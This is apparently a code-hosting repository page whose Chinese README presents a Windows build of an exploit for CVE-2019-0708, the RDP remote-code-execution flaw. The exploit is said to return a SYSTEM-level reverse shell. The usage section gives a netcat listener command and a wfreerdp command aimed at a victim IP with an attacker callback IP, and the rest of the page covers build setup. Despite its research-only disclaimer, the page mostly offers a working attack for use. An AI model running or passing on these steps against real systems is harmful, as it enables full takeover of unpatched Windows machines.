# CVE-2019-0708-EXP-WIndows **Repository Path**: reuodut/CVE-2019-0708-EXP-WIndows ## Basic Information - **Project Name**: CVE-2019-0708-EXP-WIndows - **Description**: No description available - **Primary Language**: C++ - **License**: Not specified - **Default Branch**: master - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 0 - **Forks**: 15 - **Created**: 2019-09-25 - **Last Updated**: 2020-12-19 ## Categories & Tags **Categories**: Uncategorized **Tags**: None ## README # CVE-2019-0708-EXP-Windows-Version #### 申明 作者poc仅供研究目的,如果读者利用本poc从事其他行为,与本人无关 CVE-2019-0708-EXP-WIndows版独立exe运行,无需linux,python,ruby等,运行后直接反弹System权限Shell ### 复现环境 ### 1. 被攻击者操作系统Victim:Windows 7 sp1 x64位操作系统 2. 攻击者操作系统Attacker:Windows 10 x64位操作系统 3. 编译环境Visual Studio 2013 #### 使用说明 1. 进入CVE-2019-0708-EXP-Release目录 2. 运行nc.exe -lvp 7788 3. 运行wfreerdp.exe /v:Victim_IP /l:Attacker_IP,如wfreerdp.exe /v:10.120.1.160 /l:10.120.1.17 #### 安装教程 1. 复制FreeRDP-master项目至E:\git\KernelResearch\FreeRDP-master\ 2. 解压openssl.7z至C:\openssl\ 3. 以管理员身份安装nasm-2.14.02-installer-x64.exe 4. 添加C:\Program Files\NASM至path环境变量 5. 以管理员身份安装cmake-3.15.3-win64-x64.msi 6. 添加C:\Program Files\CMake\bin至path环境变量 5. 重启计算机 6. 解压nasmBuildCustomizations.rar其中3个文件至C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\BuildCustomizations\ 7. client->common->freerdp-client工程目录右击->"工程依赖项"->"生成自定义",然后勾选nasm这一项 8. 运行"C:\Program Files\CMake\bin\cmake.exe" E:\git\KernelResearch\FreeRDP-master\CMakeCache.txt 9. 编译项目,如果发现仍然缺少文件,可以从FreeRDP-master-restore.7z还原 #### 运行效果 ![查看大图](https://s2.ax1x.com/2019/09/23/uiXN6S.png) #### 项目托管 [我的poc地址](https://gitee.com/cbwang505/CVE-2019-0708-EXP-WIndows "poc") #### 参与贡献 作者来自ZheJiang Guoli Security Technology,邮箱cbwang505@hotmail.com